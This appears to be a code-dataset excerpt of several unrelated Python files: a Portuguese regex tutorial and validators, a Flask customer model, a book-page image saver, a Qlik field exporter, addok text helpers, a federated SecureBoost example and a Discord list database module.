Palavras que tem 1 ou n 'o' entre 'g' e 'l'\n print(re.findall(r'go?l', frase)) # Palavras que tem 0 ou 1 'o' entre 'g' 'l'\n print(re.findall(r'go{6,12}l', frase)) # Palavras que tem de 6 a 12 'o' entre 'g' e 'l'\n\n # * e + são quantificadores gulosos, então eles vão consumindo caracteres sem parar\n # Colocando um '?' após eles, os torna não gulosos\n frase = 'Python v2? Python v3? Python v3.8?'\n\n print(\"\\nQuantificadores Gulosos\")\n print(re.findall(r'Python.*\\?', frase)) # Guloso\n print(re.findall(r'Python.*?\\?', frase)) # Não guloso\n\n\ndef grupos():\n # Grupos são uma estrutura formada por (), ao usar um grupo, é salvada a expressão regular dentro dele\n # Possibilita reutilização da regex para encurtar a expressão, ou até para substituir texto\n # Os grupos podem ser acessados através de sua posição na regex, usando '\\x', onde x é a posição do grupo na regex\n # O número da posição é obtido através da contagem de parênteses abertos '('\n # Para a regex não salvar o grupo, usa-se '?:' no início do grupo\n html = '<p>Paragrafo</p> <section>Python</section> <div> </div>'\n\n print(\"\\nGrupos\")\n print(html)\n print(re.sub(r'(<(.+?)>)(.+?)(</\\2>)', r'\\1Isto aqui é um elemento \\2\\4', html)) # Substituindo texto usando grupos\n\n\ndef sequencias_especiais():\n # Sequencias especiais são representados por \\ seguido da letra que representa a sequencia\n # \\w todas os caracteres (não considera barra de espaço ou quebra de linha)\n # \\d todas os dígitos\n # \\s todas os tipos espaços em branco, incluindo quebra de linha\n # \\b representa a borda inicial ou final de uma cadeia de caracteres\n # Se a letra for maiúscula significa a negação da sequencia da letra minúscula\n frase = 'A proclamação da república aconteceu no dia 15 de novembro de 1889.'\n\n print(\"\\nSequencias Especiais\")\n print(re.findall(r'\\w+', frase)) # Todas as palavras\n print(re.findall(r'\\d+', frase)) # Todos os números\n print(re.findall(r'\\w*?[Aa]\\b', frase)) # Todas as palavras terminadas em a\n\n\ndef flags():\n # Flags são usadas para validar certos caracteres ou palavras no texto passado por completo\n # re.IGNORECASE - Não difere letras maiúsculas de minúsculas\n # re.ASCII - Considera somente caracteres no padrão ASCII\n # re.MULTILINE - Considera cada linha do texto passado como um novo texto\n # re.DOTALL - Considera agora quebras de linha\n emails = '''\n Joao@gmail.com online\n Marcos@gmail.com offline\n Ana@gmail.com online\n '''\n\n print(\"\\nFlags\")\n print(re.findall(r'\\w+?@gmail.com\\s(?:ONLINE|offline)$', emails, flags=re.MULTILINE | re.IGNORECASE))\n print(re.findall(r'\\w+', emails, flags=re.ASCII))\n\n\ndef capturando_condicionalmente():\n # Capturando palavras condicionadas a outras palavras\n # Usando grupos, colocar ?= antes da palavra que atua como condição de captura para capturar\n # palavras que contém o grupo com o ?=\n # Para capturar palavras que não contém tal palavra, usa-se ?! ao invés de ?=\n emails = '''\n Joao@gmail.com online\n Marcos@gmail.com offline\n Ana@gmail.com online\n '''\n print(\"\\nCapturando palavras condicionalmente\")\n print(re.findall(r'(\\w+?@gmail.com)\\s(?=online)', emails)) # Usuários online\n print(re.findall(r'(\\w+?@gmail.com)\\s(?=offline)', emails)) # Usuários offline\n\n\ndef tutorial_basico():\n nocoes_basicas()\n meta_caracteres()\n quantificadores()\n grupos()\n sequencias_especiais()\n flags()\n capturando_condicionalmente()\n\n\n# Funções que validam campos\ndef valida_email():\n option = 1\n while option == 1:\n email = input('Validando email, digite algum: ')\n email_regex = re.compile(r'^\\w+(?:[.\\-+!&%]\\w+)*@\\w+(?:[.\\-]\\w+)+$')\n # No email, apenas alguns caracteres especiais podem existir\n match = email_regex.search(email)\n print('Válido' if match else 'Não válido')\n option = int(input('Quer tentar de novo? Digite 1 para mais uma vez: '))\n\n\ndef valida_ip():\n option = 1\n while option == 1:\n ip = input('Validando IP, digite algum: ')\n ip_regex = re.compile(r'^(?:(?:25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9][0-9]|[0-9])\\.){3}(?:25[0-5]|2[0-4][0-9]|'\n r'1[0-9]{2}|[1-9][0-9]|[0-9])$', flags=re.M)\n match = ip_regex.search(ip)\n print('Válido' if match else 'Não válido')\n option = int(input('Quer tentar de novo? Digite 1 para mais uma vez: '))\n\n\ndef valida_cpf():\n # Não validando CPFs sequenciais, como 000.000.000-00\n option = 1\n while option == 1:\n cpf = input('Validando cpf, digite algum (digite da forma xxx.xxx.xxx-xx): ')\n cpf_regex = re.compile(r'^(?!(\\d)\\1{2}\\.\\1{3}\\.\\1{3}-\\1{2})(\\d{3}\\.\\d{3}\\.\\d{3}-\\d{2})$', flags=re.M)\n match = cpf_regex.search(cpf)\n print('Válido' if match else 'Não válido')\n option = int(input('Quer tentar de novo? Digite 1 para mais uma vez: '))\n\n\ndef valida_senha():\n option = 1\n while option == 1:\n senha = input('Validando senhas fortes(ao menos 10 caracteres, 1 dígito e uma maiuscula), digite alguma: ')\n senha_regex = re.compile(r'^(?=.*[a-z])(?=.*[A-Z])(?=.*[0-9]).{10,}$', flags=re.M)\n match = senha_regex.search(senha)\n print('Válido' if match else 'Não válido')\n option = int(input('Quer tentar de novo, digite 1 para mais uma vez: '))\n\n\ndef valida_telefone():\n option = 1\n while option == 1:\n telefone = input('Validando telefones celulares brasileiros (padrão +55 xx 9xxxxxxxx), digite algum: ')\n telefone_regex = re.compile(r'^\\+55 \\d{2} 9\\d{8}$')\n match = telefone_regex.search(telefone)\n print('Válido' if match else 'Não válido')\n option = int(input('Quer tentar de novo? Digite 1 para mais uma vez: '))\n\n\ndef valida_notacao_cientifica():\n option = 1\n while option == 1:\n notacao = input('Validando números em notação científica, positivos ou negativos,'\n ' da forma n,n*10^n, ex: 1,2*10^3 digite algum: ')\n notacao_regex = re.compile(r'^[+-]?[1-9],\\d+?\\*10\\^[-]?\\d+?$')\n match = notacao_regex.search(notacao)\n print('Válido' if match else 'Não válido')\n option = int(input('Quer tentar de novo? Digite 1 para mais uma vez: '))\n\n\ndef menu_validacao():\n num = 3\n while num != 0:\n num = int(input('\\nMenu de Validação de Campos\\n'\n 'Digite 1 para validar email\\nDigite 2 para validar IP\\nDigite 3 para validar CPF\\n'\n 'Digite 4 para validar senha\\nDigite 5 para validar telefone\\n'\n 'Digite 6 para validar números em notação científica\\nDigite 0 para sair\\n'))\n if num == 1:\n valida_email()\n elif num == 2:\n valida_ip()\n elif num == 3:\n valida_cpf()\n elif num == 4:\n valida_senha()\n elif num == 5:\n valida_telefone()\n elif num == 6:\n valida_notacao_cientifica()\n elif num == 0:\n pass\n else:\n print('Essa opção não existe')\n\n\nif __name__ == '__main__':\n selecao = 10\n while selecao != 0:\n selecao = int(input('\\nDigite 1 para ir ao tutorial básico\\nDigite 2 para ir ao menu de validação de campos\\n'\n 'Digite 0 para sair\\n'))\n if selecao == 1:\n tutorial_basico()\n elif selecao == 2:\n menu_validacao()\n elif selecao == 0:\n break\n else:\n print('Opção inválida')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"204614722","text":"# -*- coding:utf-8 -*-\nfrom flask import g\n\nfrom database import db\nfrom utils.models import ORModel, JsonSerializable\nfrom sqlalchemy.orm import relationship, backref\n\nimport bcrypt, datetime, hashlib, random\n\nclass Customer(db.Model, ORModel, JsonSerializable):\n __tablename__ = 'customers'\n\n id = db.Column(db.Integer, primary_key=True)\n intern_id = db.Column(db.String(50), nullable=False, unique=True)\n created = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)\n\n email = db.Column(db.String(250), nullable=True)\n name = db.Column(db.String(250), nullable=False)\n removed = db.Column(db.DateTime, nullable=True, default=None)\n\n address = db.Column(db.String(250), nullable=True)\n zipcode = db.Column(db.String(50), nullable=True)\n city = db.Column(db.String(250), nullable=True)\n country = db.Column(db.String(250), nullable=True)\n\n company = db.Column(db.String(50), nullable=True)\n vat = db.Column(db.String(50), nullable=True)\n\n account_id = db.Column(db.Integer, db.ForeignKey('accounts.id'), nullable=False)\n account = relationship('Account', backref=backref('customers'))\n\n def __init__(self):\n self.intern_id = 'cust_{0}'.format(hashlib.md5(str(datetime.datetime.utcnow()) + \"{0:04d}\".format(random.randrange(0, 9999))).hexdigest(),)\n\n def __jsonserialize__(self):\n data = {\n 'id': self.intern_id,\n 'created': int((self.created - self.UNIX_EPOCH).total_seconds() * 1000),\n 'email': self.email,\n 'name': self.name,\n 'address': self.address,\n 'zipcode': self.zipcode,\n 'city': self.city,\n 'country': self.country,\n 'company': self.company,\n 'vat': self.vat,\n }\n\n for meta in self.metas:\n data[meta.name] = meta.value\n\n return data\n\n def __repr__(self):\n return self.name\n\n @classmethod\n def find_by_email(cls, email):\n \"\"\"\n Return the invoice of given id,\n \"\"\"\n return cls.query.filter(cls.email == email).filter(cls.account_id == g.account.id).first()\n\n @classmethod\n def find_by_id(cls, intern_id):\n \"\"\"\n Return the invoice of given id,\n \"\"\"\n return cls.query.filter(cls.intern_id == intern_id).filter(cls.account_id == g.account.id).first()\n\n @classmethod\n def create(cls, customer):\n cust = Customer()\n cust.account = g.account\n cust.account_id = g.account.id\n cust.name = customer['name']\n\n cust.email = customer['email'] if 'email' in customer else None\n cust.address = customer['address'] if 'address' in customer else None\n cust.zipcode = customer['zipcode'] if 'zipcode' in customer else None\n cust.city = customer['city'] if 'city' in customer else None\n cust.country = customer['country'] if 'country' in customer else None\n cust.company = customer['company'] if 'company' in customer else None\n cust.vat = customer['vat'] if 'vat' in customer else None\n cust.save()\n\n for item in customer:\n if item in ['name', 'email', 'address', 'zipcode', 'city', 'country', 'company', 'vat', 'account_id', 'account']:\n continue\n\n CustomerMeta.create(cust, item, customer[item])\n\n\n return cust\n\nclass CustomerMeta(db.Model, ORModel):\n __tablename__ = 'customer_metas'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), nullable=False)\n value = db.Column(db.String(250), nullable=False)\n\n customer_id = db.Column(db.Integer, db.ForeignKey('customers.id'), nullable=False)\n customer = relationship('Customer', backref=backref('metas'))\n\n @classmethod\n def create(cls, customer, name, value):\n if value is None:\n return None\n\n meta = CustomerMeta()\n meta.name = name\n meta.value = value\n meta.customer_id = customer.id\n meta.customer = customer\n meta.save()\n\n return meta\n","sub_path":"apps/customers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"11964392","text":"from flask import Flask,request,make_response\nfrom selenium import webdriver\nfrom PIL import Image\nfrom io import BytesIO\nimport os\n\napp = Flask(__name__)\n\n@app.route('/save/<title>',methods=['POST'])\ndef save(title):\n try:\n imgData = request.stream.read() # 存放当前返回的下载图片的内容,用于检验是否是加载中图片\n if not os.path.exists('Download'+os.sep+title): # 下载目录中不存在书的title(文泉学堂中书的ID)\n os.makedirs('Download'+os.sep+title)\n pagesTotal[title] = int(request.args.get('ap')) # 初始化该书总页数\n pagesLeft[title] = list(range(1,pagesTotal[title]+1)) # 初始化本书未下载的页码\n elif not title in pagesLeft: # 已经下载过\n response = make_response('')\n elif request.args.get('k') != 'width=100' and pagesLeft[title]: # 不是低分辨率图片且该书未下载完成\n if Image.open(BytesIO(imgData)).histogram() != emptyImgHis: # 不是加载中图片\n page = request.args.get('page') # 当前获取的图片所对应的页码\n with open('Download'+os.sep+title+os.sep+page+'.png','wb') as img:\n img.write(imgData)\n if int(page) in pagesLeft[title]:\n pagesLeft[title].pop(pagesLeft[title].index(int(page))) # 在本书的未下载列表中除去当先页面\n if pagesLeft[title]: # 本书还有页面未下载\n response = make_response('window.scrollTo(document.getElementsByClassName(\\'page-img-box\\')[{page}].offsetLeft,document.getElementsByClassName(\\'page-img-box\\')[{page}].offsetTop);'.format(page=pagesLeft[title][0])+ \\\n 'window.downloaderRefreshClocks.forEach((id)=>{window.clearInterval(id)});'+ \\\n 'window.downloaderRefreshClocks=[];') # 发送指令使网页滚动到本书的未下载中第一页的位置来引发文泉学堂阅读器获取列表第一页图片,清空downloaderRefreshClocks,因为下载已经开始不用再刷新\n elif title not in titlesDone: # 本书已下载完成\n print('-'*20+title+' Done.Downloaded '+str(pagesTotal[title])+' pages.'+'-'*20)\n titlesDone.append(title)\n response = make_response('alert(\\'Done\\')')\n else: # 检测到加载中图片,发送倒计时刷新指令\n response = make_response('window.downloaderRefreshClocks.push(setTimeout(()=>{location.reload()},10000))')\n else:\n response = make_response('')\n \n except BaseException as error: # 捕获所有异常\n print('[#] Error:',end='')\n print(error)\n response = make_response('')\n response.headers['Access-Control-Allow-Origin'] = '*'\n return response\n\nif __name__ == '__main__':\n pagesTotal = {} # 记录每一本书的页数,用于检验是否下载完成\n pagesLeft = {} # 记录每一本书还未下载的页数\n titlesDone = [] # 记录已经下载完成的书的title(就是文泉学堂中书的ID)\n emptyImgHis = Image.open('empty.png').histogram() # 加载中图片的数据,避免下载非书本内容图片]\n app.run(host='127.0.0.1')","sub_path":"save_img.py","file_name":"save_img.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"330681562","text":"\"\"\"\"\nThe purpose of this script is to get Fields for documents.\nInput is document name. Output is the list of tables that are used in the application.\n\"\"\"\n\nimport argparse\nfrom lib.sense_engine_api import *\nimport os\nfrom lib import write2excel\n\n\ntaglist = ['$ascii', '$text', '$key', '$hidden', '$system', '$numeric', '$integer', '$timestamp', '$date',\n '$geoname', '$keypart', '$wgs84', '$geomultipolygon', '$geopolyline', '$geopoint']\n\n\ndef handle_fields_file(fields_json):\n \"\"\"\n Function to convert a Fields file in Json structure into a list of field dictionaries. This list is then written\n to an excel file.\n\n :param fields_json: Fields information in JSON Structure\n :return:\n \"\"\"\n path_parts = os.path.normpath(fields_json).split('\\\\')\n app_name = path_parts[-2]\n app_stream = path_parts[-3]\n fh = open(fields_json)\n layout = json.load(fh)\n field_collection = layout['qFieldList']['qItems']\n field_list = []\n for item in field_collection:\n for table in item['qSrcTables']:\n field_line = dict(\n stream=app_stream,\n application=app_name,\n name=item['qName'],\n cardinal=item['qCardinal'],\n table=table\n )\n for tag in item['qTags']:\n if tag not in taglist:\n msg = f\"Tag {tag} not in taglist!\"\n logging.warning(msg)\n for tag in taglist:\n if tag in item['qTags']:\n field_line[tag[1:]] = 'Yes'\n else:\n field_line[tag[1:]] = 'No'\n field_list.append(field_line)\n if len(field_list) > 0:\n fn = os.path.join(inventory_dir, f\"{app_name}_fields.xlsx\")\n xl = write2excel.Write2Excel()\n xl.init_sheet(\"Fields\")\n xl.write_content(field_list)\n xl.close_workbook(fn)\n else:\n logging.warning(f\"No fields in document {app_name}\")\n return\n\n\n# Initialize Environment\nprojectname = \"qlik\"\nconfig = my_env.init_env(projectname, __file__)\n# Configure command line arguments and environment\nparser = argparse.ArgumentParser(description=\"Specify target environment\")\nparser.add_argument('-t', '--target', type=str, default='Remote', choices=['Local', 'Remote'],\n help='Please provide the target environment (Local, Remote).')\n# parser.add_argument('-a', '--application', type=str, default='Recouvrement',\n# help='Please provide an application name.')\nargs = parser.parse_args()\nlogging.info(\"Arguments: {a}\".format(a=args))\nprops = init_env(args.target)\nworkdir = props['workdir']\ninventory_dir = os.getenv('INVENTORYDIR')\n\nwith os.scandir(workdir) as stream_dir:\n for entry in stream_dir:\n if entry.is_dir():\n with os.scandir(entry.path) as app_dir:\n for app in app_dir:\n if app.is_dir():\n fields_file = os.path.join(app.path, 'fields.json')\n if os.path.isfile(fields_file):\n logging.info(f\"Handling Fields file: {fields_file}\")\n handle_fields_file(fields_file)\n else:\n logging.error(f\"Fields file not found: {fields_file}\")\n\nlogging.info(\"End Application\")\n","sub_path":"tools/fields2excel.py","file_name":"fields2excel.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"327815032","text":"import re\n\nfrom addok import config\nfrom addok.db import DB\nfrom addok.helpers import yielder, keys\nfrom addok.helpers.index import token_frequency\nfrom ngram import NGram\nfrom unidecode import unidecode\n\nPATTERN = re.compile(r\"[\\w]+\", re.U | re.X)\n\n\nclass Token(str):\n\n def __new__(cls, value, position=0, is_last=False, raw=None):\n obj = str.__new__(cls, value)\n obj.position = position\n obj.is_last = is_last\n obj.db_key = None\n obj.raw = raw or value # Allow to keep raw on update.\n return obj\n\n def __repr__(self):\n return '<Token {}>'.format(self)\n\n def update(self, value, **kwargs):\n default = dict(position=self.position, is_last=self.is_last,\n raw=self.raw)\n default.update(kwargs)\n token = Token(value=value, **default)\n return token\n\n def search(self):\n if DB.exists(self.key):\n self.db_key = self.key\n\n @property\n def is_common(self):\n return self.frequency > config.COMMON_THRESHOLD\n\n @property\n def frequency(self):\n if not hasattr(self, '_frequency'):\n self._frequency = token_frequency(self)\n return self._frequency\n\n @property\n def key(self):\n if not hasattr(self, '_key'):\n self._key = keys.token_key(self)\n return self._key\n\n\ndef _tokenize(text):\n \"\"\"Split text into a list of tokens.\"\"\"\n return PATTERN.findall(text)\n\n\ndef tokenize(pipe):\n for text in pipe:\n for position, token in enumerate(_tokenize(text)):\n yield Token(token, position=position)\n\n\ndef _normalize(s):\n return s.update(unidecode(s.lower()))\nnormalize = yielder(_normalize)\n\n\nSYNONYMS = {}\n\n\ndef load_synonyms():\n with config.RESOURCES_ROOT.joinpath(config.SYNONYMS_PATH).open() as f:\n for line in f:\n if line.startswith('#'):\n continue\n synonyms, wanted = line.split('=>')\n wanted = wanted.strip()\n synonyms = synonyms.split(',')\n for synonym in synonyms:\n synonym = synonym.strip()\n if not synonym:\n continue\n SYNONYMS[synonym] = wanted\nload_synonyms()\n\n\ndef _synonymize(t):\n return t.update(SYNONYMS.get(t, t))\nsynonymize = yielder(_synonymize)\n\n\nletters = 'abcdefghijklmnopqrstuvwxyz'\n\n\ndef make_fuzzy(word, max=1):\n \"\"\"Naive neighborhoods algo.\"\"\"\n # inversions\n neighbors = []\n for i in range(0, len(word) - 1):\n neighbor = list(word)\n neighbor[i], neighbor[i+1] = neighbor[i+1], neighbor[i]\n neighbors.append(''.join(neighbor))\n # substitutions\n for letter in letters:\n for i in range(0, len(word)):\n neighbor = list(word)\n if letter != neighbor[i]:\n neighbor[i] = letter\n neighbors.append(''.join(neighbor))\n # insertions\n for letter in letters:\n for i in range(0, len(word) + 1):\n neighbor = list(word)\n neighbor.insert(i, letter)\n neighbors.append(''.join(neighbor))\n if len(word) > 3:\n # removal\n for i in range(0, len(word)):\n neighbor = list(word)\n del neighbor[i]\n neighbors.append(''.join(neighbor))\n return neighbors\n\n\nclass ascii(str):\n \"\"\"Just like a str, but ascii folded and cached.\"\"\"\n\n def __new__(cls, value):\n try:\n cache = value._cache\n except AttributeError:\n cache = alphanumerize(unidecode(value.lower()))\n obj = str.__new__(cls, cache)\n obj._cache = cache\n return obj\n\n\ndef compare_ngrams(left, right, N=2, pad_len=0):\n left = ascii(left)\n right = ascii(right)\n if len(left) == 1 and len(right) == 1:\n # NGram.compare returns 0.0 for 1 letter comparison, even if letters\n # are equal.\n return 1.0 if left == right else 0.0\n return NGram.compare(left, right, N=N, pad_len=pad_len)\n\n\ndef contains(candidate, target):\n candidate = ascii(candidate)\n target = ascii(target)\n return candidate in target\n\n\ndef startswith(candidate, target):\n candidate = ascii(candidate)\n target = ascii(target)\n return target.startswith(candidate)\n\n\ndef equals(candidate, target):\n candidate = ascii(candidate)\n target = ascii(target)\n return target == candidate\n\n\ndef alphanumerize(text):\n return re.sub(' {2,}', ' ', re.sub('[^\\w]', ' ', text))\n\n\ndef compute_edge_ngrams(token, min=None):\n \"\"\"Compute edge ngram of token from min. Does not includes token itself.\"\"\"\n if min is None:\n min = config.MIN_EDGE_NGRAMS\n token = token[:config.MAX_EDGE_NGRAMS + 1]\n return [token[:i] for i in range(min, len(token))]\n","sub_path":"addok/helpers/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"470589750","text":"# Copyright 2021 Tianmian Tech. All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\nimport argparse\n\nfrom kernel.examples.handler.component import DataIO\nfrom kernel.examples.handler.component import Evaluation\nfrom kernel.examples.handler.component import Intersection\nfrom kernel.examples.handler.component import VertFastSecureBoost\nfrom kernel.examples.handler.handler import Handler\nfrom kernel.examples.handler.interface import Data\nfrom kernel.examples.handler.utils.tools import load_job_config, JobConfig\n\n\ndef main(config=\"../../config.yaml\", param=\"./binary_config.yaml\", namespace=\"wefe_data\"):\n # obtain config\n if isinstance(config, str):\n config = load_job_config(config)\n\n if isinstance(param, str):\n param = JobConfig.load_from_file(param)\n\n parties = config.parties\n promoter = parties.promoter[0]\n provider = parties.provider[0]\n\n backend = config.backend\n work_mode = config.work_mode\n db_type = config.db_type\n\n # data sets\n promoter_train_data = {\"name\": param['data_promoter_train'], \"namespace\": namespace}\n provider_train_data = {\"name\": param['data_provider_train'], \"namespace\": namespace}\n promoter_validate_data = {\"name\": param['data_promoter_val'], \"namespace\": namespace}\n provider_validate_data = {\"name\": param['data_provider_val'], \"namespace\": namespace}\n\n # init handler\n handler = Handler(job_id=\"job_fast-vertsbt_0002\", backend=backend, work_mode=work_mode, db_type=db_type,\n fl_type='vertical') \\\n .set_initiator(role=\"promoter\", member_id=promoter) \\\n .set_roles(promoter=promoter, provider=provider)\n\n # set data reader and data-io\n dataio_0, dataio_1 = DataIO(name=\"dataio_0\"), DataIO(name=\"dataio_1\")\n\n dataio_0.get_member_instance(role=\"promoter\", member_id=promoter).component_param(table=promoter_train_data,\n with_label=True,\n output_format=\"dense\")\n dataio_0.get_member_instance(role=\"provider\", member_id=provider).component_param(table=provider_train_data,\n with_label=False)\n dataio_1.get_member_instance(role=\"promoter\", member_id=promoter).component_param(table=promoter_validate_data,\n with_label=True,\n output_format=\"dense\")\n dataio_1.get_member_instance(role=\"provider\", member_id=provider).component_param(table=provider_validate_data,\n with_label=False)\n\n # data intersect component\n intersect_0 = Intersection(name=\"intersection_0\", intersect_method=\"dh\", sync_intersect_ids=True)\n intersect_1 = Intersection(name=\"intersection_1\", intersect_method=\"dh\", sync_intersect_ids=True)\n\n # secure boost component\n fast_secure_boost_0 = VertFastSecureBoost(name=\"vert-fast_secure_boost_0\",\n num_trees=param['tree_num'],\n task_type=param['task_type'],\n objective_param={\"objective\": param['loss_func']},\n encrypt_param={\"method\": \"iterativeAffine\"},\n tree_param={\"max_depth\": param['tree_depth']},\n validation_freqs=10,\n learning_rate=param['learning_rate'],\n work_mode=param['work_mode'],\n tree_num_per_member=param['tree_num_per_member'],\n promoter_depth=param['promoter_depth'],\n provider_depth=param['provider_depth']\n )\n\n # evaluation component\n evaluation_0 = Evaluation(name=\"evaluation_0\", eval_type=param['eval_type'])\n\n handler.add_component(dataio_0)\n # handler.add_component(dataio_1)\n handler.add_component(intersect_0, data=Data(data=dataio_0.name), output_data_type=['train'])\n # handler.add_component(intersect_1, data=Data(data=dataio_1.name),output_data_type=['evaluation'])\n handler.add_component(fast_secure_boost_0, data=Data(train_data=intersect_0.name))\n handler.add_component(evaluation_0, data=Data(data=fast_secure_boost_0.name))\n\n handler.compile()\n handler.fit()\n\n print(handler.get_metric_summary(name='evaluation_0', component_name=\"vert-fast_secure_boost_0\"))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"FAST VERT SBT JOB\")\n parser.add_argument(\"-config\", type=str,\n help=\"config file\")\n parser.add_argument(\"-param\", type=str,\n help=\"config file for params\")\n args = parser.parse_args()\n if args.config is not None:\n main(args.config, args.param)\n else:\n main()\n","sub_path":"kernel/examples/demo/vert_fast_sbt/wefe-fast-vert-sbt.py","file_name":"wefe-fast-vert-sbt.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"414710245","text":"# manages interfacing with heroku postgres db for ListKeeper cog\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy import create_engine, ForeignKey, Column, String, func\nimport secrets\nimport json\nimport os\n\nfrom typing import Union, List, Set, Any\n\nclass DatabaseError(Exception):\n def __init__(self, message=\"Unable to complete database operation!\", object_to_debug: Any=None) -> None:\n self.message: str = message\n super().__init__(self.message)\n\n# TODO: handle possibility of db downtime\n\n# config / envvars\nDATABASE_URL: Union[str, None] = None\ntry:\n with open(\"./config.json\") as f: # when hosted from a normal filesystem\n DATABASE_URL = json.load(f)[\"DATABASE_URL\"]\nexcept: # when hosted from Heroku / envvars\n DATABASE_URL = os.environ[\"DATABASE_URL\"].replace(\"postgres\", \"postgresql\") # Heroku demands \"postgres\" instead of \"postgresql\"\n\n\ntry:\n engine = create_engine(DATABASE_URL, echo=False)\nexcept:\n raise DatabaseError(f\"Unable to connect to the database! Address used: {DATABASE_URL}\")\nBase = declarative_base()\nSession = sessionmaker(bind=engine, expire_on_commit=False)\n\n\nclass Collection(Base):\n __tablename__ = \"collection\"\n\n name = Column(String, nullable=False)\n description = Column(String, nullable=False)\n collection_id = Column(String, primary_key=True, nullable=False)\n items = relationship(\"Item\", back_populates=\"collection\", lazy=\"joined\", cascade=\"all, delete-orphan\")\n guild_id = Column(String, nullable=False)\n\n\nclass Item(Base):\n __tablename__ = \"item\"\n\n name = Column(String, nullable=False)\n note = Column(String, nullable=True)\n item_id = Column(String, primary_key=True, nullable=False)\n collection_id = Column(String, ForeignKey(\"collection.collection_id\"), nullable=False)\n collection = relationship(\"Collection\", lazy=\"joined\", back_populates=\"items\")\n\n\nBase.metadata.create_all(engine)\n\n\n## HELPER FUNCTIONS ##\n## Create\ndef create_collection(name: str, description: Union[str, None], collection_id: str, guild_id: str) -> Collection:\n description = \"\" if description == None else description # default argument \"\" (conditional expression)\n new_colx = Collection(name=name, description=description, collection_id=collection_id, guild_id=guild_id)\n with Session() as session:\n try:\n session.add(new_colx)\n session.commit()\n return new_colx\n except:\n raise DatabaseError(\n \"Failed to add new entry to database!\\n\" +\n \"new_colx\\n\" +\n f\"name: {name}\\n\" +\n f\"description: {description}\\n\" +\n f\"collection_id: {collection_id}\\n\" +\n f\"guild_id: {guild_id}\\n\"\n )\n\n\ndef create_item(name: str, note: Union[str, None], item_id: str, collection_id: str) -> Item:\n note = \"\" if note is None else note\n new_item: Item = Item(name=name, note=note, item_id=item_id, collection_id=collection_id)\n with Session() as session:\n try:\n session.add(new_item)\n session.commit()\n except:\n raise DatabaseError(\n \"Failed to add new entry to database!\\n\" +\n \"new_item\\n\" +\n f\"name: {name}\\n\" +\n f\"note: {note}\\n\" +\n f\"item_id: {item_id}\\n\" +\n f\"collection_id: {collection_id}\\n\"\n )\n return new_item\n\n\n## Read\ndef get_guild_collections(guild_id: str) -> List[Collection]:\n with Session() as session:\n results: List[Collection] = (\n session.query(Collection)\n .filter(Collection.guild_id==guild_id)\n .all()\n )\n \n if not results:\n raise DatabaseError(\"No results found!\")\n\n return results\n\n\ndef get_collection_by_name(name: str, guild_id: str) -> Collection:\n with Session() as session:\n result: Collection = (\n session.query(Collection)\n .filter(func.lower(Collection.name) == name.lower())\n .filter(Collection.guild_id == guild_id)\n .first()\n )\n\n if result is None:\n raise DatabaseError(f\"Collection '{name}' not found!\")\n\n return result\n\n\ndef get_items(collection_name: str, guild_id: str) -> List[Item]:\n try:\n found_colx: Union[Collection, None] = get_collection_by_name(collection_name, guild_id)\n except DatabaseError as e:\n raise DatabaseError(e)\n\n with Session() as session:\n results: List[Item] = (\n session.query(Item)\n .filter(Item.collection_id == found_colx.collection_id)\n .all()\n )\n\n if not results:\n raise DatabaseError(f\"No items found for collection '{collection_name}'!\")\n\n return results\n\n\n## Update TODO\n\n\n## Delete\ndef delete_collection_by_name(name: str, guild_id: str) -> None:\n try:\n colx_to_delete: Collection = (\n get_collection_by_name(name=name, guild_id=guild_id)\n )\n except DatabaseError as e:\n raise DatabaseError(e)\n\n try:\n with Session() as session: \n session.delete(colx_to_delete)\n session.commit()\n except:\n raise DatabaseError()\n\n\ndef delete_item(collection_name: str, guild_id: str, item_name: str) -> None:\n with Session() as session:\n try:\n parent_collection: Collection = (\n get_collection_by_name(name=collection_name, guild_id=guild_id)\n )\n except DatabaseError as e:\n raise DatabaseError(e)\n \n # TODO abstract this into its own function\n item_to_delete: Item = (\n session.query(Item)\n .filter(Item.collection_id==parent_collection.collection_id)\n .filter(func.lower(Item.name)==item_name.lower())\n .first()\n )\n if item_to_delete is None:\n raise DatabaseError(f\"Item {item_name} not found!\")\n\n try:\n session.delete(item_to_delete)\n session.commit()\n except:\n raise DatabaseError(f\"Unable to delete item '{item_name}'\")\n\n\n## ID Management\nwith Session() as session:\n tmp: List[Item] = session.query(Item).all() # These two lines create a set of all ids in use, to prevent creating duplicates\n used_ids: Set[str] = set([i.collection_id for i in tmp] + [j.item_id for j in tmp])\n\ndef generate_id() -> str:\n while True: # loop until we get a unique ID\n id: str = secrets.token_hex(4)\n if id not in used_ids:\n used_ids.add(id)\n return id","sub_path":"cogs/utils/listkeeper/lkdb.py","file_name":"lkdb.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"50995908","text":"from redsolutioncms.make import 